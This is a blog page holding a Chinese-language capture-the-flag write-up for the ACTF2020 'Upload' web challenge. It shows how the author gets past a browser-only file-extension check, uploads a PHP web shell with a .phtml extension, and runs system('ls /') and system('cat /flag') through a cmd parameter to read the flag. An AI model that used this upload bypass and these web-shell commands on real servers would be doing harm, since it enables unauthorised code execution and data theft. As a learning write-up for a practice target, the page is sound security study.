<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Upload"><meta name="keywords" content="web,刷题"><meta name="author" content="Jardny"><meta name="copyright" content="Jardny"><title>Upload | Jardny's Blog</title><link rel="shortcut icon" href="/Jardny.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Jardny's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Upload"><span class="toc-number">1.</span> <span class="toc-text">[ACTF2020 新生赛]Upload</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Jardny</div><div class="author-info__description text-center">人生没有白走的路，走的每一步都算数！</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">10</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">5</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">6</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Jardny's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="{&quot;url&quot;:&quot;/&quot;}">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">Author</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">Upload</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-11-20</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/">Web每日一题</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="ACTF2020-新生赛-Upload"><a href="#ACTF2020-新生赛-Upload" class="headerlink" title="[ACTF2020 新生赛]Upload"></a>[ACTF2020 新生赛]Upload</h2><p>“.php”,”.php5”,”.php4”,”.php3”,”.php2”,”.php1”,”.html”,”.htm”,”.phtml”,”.pht”,”.pHp”,”.pHp5”,”.pHp4”,”.pHp3”,”.pHp2”,”.pHp1”,”.Html”,”.Htm”,”.pHtml”,”.jsp”,”.jspa”,”.jspx”,”.jsw”,”.jsv”,”.jspf”,”.jtml”,”.jSp”,”.jSpx”,”.jSpa”,”.jSw”,”.jSv”,”.jSpf”,”.jHtml”,”.asp”,”.aspx”,”.asa”,”.asax”,”.ascx”,”.ashx”,”.asmx”,”.cer”,”.aSp”,”.aSpx”,”.aSa”,”.aSax”,”.aScx”,”.aShx”,”.aSmx”,”.cEr”,”.sWf”,”.swf”,”.ini</p>
<p> php <a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E6%9C%8D%E5%8A%A1%E5%99%A8&spm=1001.2101.3001.7020">服务器</a>可以把其他后缀的文件解析后可作为代码运行。</p>
<p>1：白名单</p>
<p><img src="https://s2.loli.net/2023/11/20/RjxrCGIcMky7HpZ.png" alt="image-20231120234113706"></p>
<p>试了一下上传jpg和配置文件htacess</p>
<p>任何发现jpg文件可以上传，所以知道它是白名单的文件上传</p>
<p><img src="https://s2.loli.net/2023/11/20/Sw92FsV3ZzOlApR.png" alt="image-20231120235158579"></p>
<p><img src="https://s2.loli.net/2023/11/21/6J78PWq3Ncafn1y.png" alt="image-20231121001103592"></p>
<p>发现只是前端的检查</p>
<p>可以上传htacess</p>
<p>所以会把所有的文件当成php来执行</p>
<p><img src="https://s2.loli.net/2023/11/21/RlAZUwvHLGdimjk.png" alt="image-20231121001220333"></p>
<p>马上传成功</p>
<p><img src="https://s2.loli.net/2023/11/21/9wLu4zVoO2g8MX5.png" alt="image-20231121001547863"></p>
<p>不知道为什么上传了hta上传了马还是不行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">因为那个配置文件命名确定只能.htacess那种 前面不能加东西</span><br></pre></td></tr></table></figure>



<p>2：重命名</p>
<p><img src="https://s2.loli.net/2023/11/20/SpJ4O8KytcG5N9s.png" alt="image-20231120235416629"></p>
<p><img src="https://s2.loli.net/2023/11/21/oLUSzGRQa68eNMX.png" alt="image-20231121000052563"></p>
<p>上传成功了但是测试phpinfo（）没有显示诶</p>
<p>试一下蚂蚁，也不行</p>
<p>看了题解，发现php不行测试php2，php5，phtml</p>
<p><img src="https://s2.loli.net/2023/11/21/dqgv31FeGUaYOPl.png" alt="image-20231121001822042"></p>
<p>虽然不知道为什么这个就行。。。</p>
<p><img src="https://s2.loli.net/2023/11/21/74K59WJTVE1HFCO.png" alt="image-20231121002141445"></p>
<p><img src="https://s2.loli.net/2023/11/21/yzp79isLI5XMtGn.png" alt="image-20231121002410316"></p>
<p>蚁剑只能连post 好吧记住了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://695a04c4-39f0-4f52-a475-d626b6c910c7.node4.buuoj.cn:81/uplo4d/eec4cd34266a99b471a4ebe1c5cb5488.phtml?cmd=system(%27ls%20/%27);</span><br></pre></td></tr></table></figure>

<p>找根目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var </span><br></pre></td></tr></table></figure>

<p>找到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=system(%27cat%20/flag%27);</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;d9571b24-da91-430a-bc77-307854476081&#125; </span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Jardny</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2023/11/20/[ACTF2020 新生赛]Upload/">http://example.com/2023/11/20/[ACTF2020 新生赛]Upload/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/%E5%88%B7%E9%A2%98/">刷题</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/11/21/%E5%85%AD%E7%BA%A7%E5%A4%87%E8%80%83%E4%B9%8B%E5%90%AC%E5%8A%9B/"><i class="fa fa-chevron-left">  </i><span>六级备考之听力</span></a></div><div class="next-post pull-right"><a href="/2023/11/19/%5B%E7%BA%A2%E6%98%8E%E8%B0%B7CTF-2021%5Dwrite_shell/"><span>write_shell</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2023 By Jardny</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>